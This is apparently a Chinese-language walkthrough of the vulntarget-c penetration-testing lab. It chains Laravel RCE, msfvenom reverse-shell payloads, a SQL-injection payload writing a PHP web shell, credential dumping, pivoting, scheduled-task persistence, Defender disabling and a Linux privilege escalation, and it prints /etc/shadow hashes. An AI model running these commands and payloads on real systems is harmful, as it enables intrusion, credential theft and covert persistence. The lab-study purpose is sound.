【靶场系列】vulntarget-c靶场练习

记录vultarget靶场系列,学习内网渗透相关知识

外网ubuntu20

web打点

访问web服务,发现laravel框架

image-20220428100909088

做一下端口扫描,显示只开放了22、80端口

image-20220428100958344

之前做过laravel的命令执行复现,直接xray扫一下,确实存在

laravel-cve-2021-3129

image-20220428101123576

使用yh的功夫熊猫(RCE利用框架)打一下,也是没问题的

image-20220428101519274

尝试直接反弹shell、base编码后反弹,均失败,猜测应该是特殊字符没带进去

image-20220428103848991

web默认目录

image-20220428103950702

尝试写入文件,echo失败

image-20220428104033198

蚁剑上线

尝试wget写入,成功!

image-20220428104401340

蚁剑连接上线

image-20220428104416341

MSF上线

msf生成payload

msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.1.214 lport=4444 -f elf -o 4444.elf

蚁剑上传后执行,提示Segmentation fault,MSF显示能接收但很快断开image-20220428105517884

image-20220428105526419

找了半天错,发现msf中载荷设置成了linux/x64/meterpreter_reverse_tcp

而应该是linux/x64/meterpreter/reverse_tcp

然后成功上线:

image-20220428110558623

探测提权模块,失败

run post/multi/recon/local_exploit_suggester
image-20220428111113283

查看/etc/passwd,发现vulntarget用户

image-20220428111226951

爆破口令,发现存在弱口令vulntarget:root

image-20220428111538234

sodu -l发现当前用户是可以直接root权限的,输入密码root后成功提权

image-20220428111728276

看到flag如下

image-20220428111805837

内网信息搜集

查看网卡,发现存在内网

image-20220428112620405

使用msf扫描到内网一台主机

route add 10.0.20.0 255.255.255.0 18
use auxiliary/scanner/portscan/tcp
set rhosts 10.0.20.0/24
set ports 21,22,80,135,139,443,445,8080
run
image-20220428112759701

使用gost在外网主机上监听一个端口,以便访问内网主机

./gost-linux-amd64 -L=:2989
image-20220428115027035
image-20220428113700918

fscan扫描结果,没啥有用信息,内网主机都没有扫到,应该是内网禁了ping

image-20220428114206698

内网windows

web打点

image-20220428114700978

访问:http://10.0.20.100/admin/

admin:admin123弱口令进入后台

sql注入

开启xray一顿扫,Inquiries功能点发现sql注入

image-20220428115707982

sqlmap验证,存在sql注入

sqlmap -r 1.txt --proxy=socks5://192.168.1.210:2989 --banner
image-20220428120110791

直接getshell

sqlmap -r 1.txt --proxy=socks5://192.168.1.210:2989 --os-shell
image-20220428120308243

tasklist -v,识别到存在defender

image-20220428121009904

使用sqlmap生成的后门,蚁剑连接,发现一直是返回数据为空

image-20220428121747839
image-20220428121920660

GET方式是没问题的

image-20220428121932884

使用union直接写入马

http://10.0.20.100/admin/inquiries/view_details.php?id=-1%27//union//select//NULL,0x3c3f706870202461203d2024474c4f42414c533b2024737472203d20275f504f5354273b206576616c2f2a2a6e6963652a2a2f2827272e2024615b247374725d5b27676779275d2e204e554c4c293b203f3e,NULL,NULL,NULL,NULL,NULL//into//outfile//%27C:\xampp\htdocs\ovas\admin\inquiries\ggg9.php%27--+

蚁剑成功连接

image-20220428143734854

信息搜集,存在内网

image-20220428143946957

MSF上线

制作一个msf马,使用掩日进行免杀

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.0.20.141 lport=8574 -f exe -o 8574.exe
image-20220428145128880

外网机器使用gost配置流量转发

./gost-linux-amd64 -L=:8574 -F=192.168.1.214:8574

蚁剑终端中运行免杀马,发现没用任何流量经过,应该是被defender杀了

使用掩日的本地分离免杀方式再次生成

image-20220428145337688

再次运行还是没用任何流量

image-20220428145553804

下面尝试使用正向tcp连接:

生成马:

msfvenom -p windows/x64/meterpreter/bind_tcp  LPORT=21831 -f exe > 21831.exe

掩日-本地分离方式生成马

image-20220429104845147

gost监听端口转发到内网:

./gost-linux-amd64 -L=:21831 -F=10.0.20.100:21831

蚁剑上传马后执行,kali连接,仍然失败

image-20220429105347022

最后发现是gost使用错了

转发应该:

./gost-linux-amd64 -L=:21831/192.168.1.214:21831

msf成功上线,并且是system权限

image-20220429112641236

信息搜集

抓取密码

load kiwi
creds_all
image-20220429112800647

解密出明文密码

image-20220429112827783

systeminfo,发现其不存在域环境,两个补丁,Winserver2016

image-20220429113149808

ipconfig,发现其还存在一张网卡

image-20220429113245399

添加路由,使用portscan模块扫描内网

route add 10.0.10.0 255.255.255.0 4
use auxiliary/scanner/portscan/tcp
set rhosts 10.0.20.0/24
set ports 21,22,80,135,139,443,445,8080
set threads 30
run

探测到一个主机和多个端口,开放22应该是linux机器

image-20220429114548615

linux开放22且在大内网下,猜测应该是用Windows连接上去的

开放Windows的远程连接端口

reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

使用跳板机的代理,kali连接

proxychains remmina
image-20220429115345602
image-20220429115448702

发现桌面存在ssh连接工具,输入本机密码就进去了

里面存在一台主机的连接信息,和扫到的ip一致,双击直接连上

image-20220429115705657

权限维持

创建一个bat脚本,1.bat

C:\\xampp\\htdocs\\ovas\\admin\\inquiries\\UBG.exe C:\\xampp\\htdocs\\ovas\\admin\\inquiries\\UBG.txt
image-20220429161331266

创建计划任务

schtasks /create /tn bd /tr "C:\\1.bat" /sc minute /mo 1 /ru System
  • /tn 指定计划任务的名称
  • /tr 指定程序所在路径,这里为指定要执行的批处理存放路径。
  • /sc 为指定运行的周期
  • /mo 多久运行一次
  • /ru 指定运行该批处理的账号,如果去掉该参数则默认为当前账户运行,会提示输入密码。(一个计划任务所用的账号如果密码变动后该批处理就不再会运行成功)
image-20220429161422535

此时再继续监听,同时跳板机进行流量转发,每分钟都会收到流量

image-20220429161514030

大内网ubuntu

信息搜集:

ubuntu16 64位机器

image-20220429115910248

提权

https://github.com/briskets/CVE-2021-3493

kali编译后传到windows,发现被defender杀了

关闭defender重新上传:happy:

image-20220429155307350

成功提权至root

image-20220429155348237

提取/etc/shadow

image-20220429162208043
root:$6$4SeN18Sz$6b3LL.yqESNdbbjgl7xwsoFiXeJ9AdgVCwrH9TSZjGYPfp/vdsl6pIyz65T7ghxGoo0ZB9uv9A11ES1aRANkq1:19005:0:99999:7:::
vulntarget:$6$gkj3jCKf$RYOFztZtv.w9DQd7d5r14hOojtCZ2KupC/S6O5gqGJfb4c4Eye4tnygPSTHXKvuAxi5TxNY6W2gQiTCAXbyey1:19006:0:99999:7:::

john破解未果

获取flag

image-20220429162602705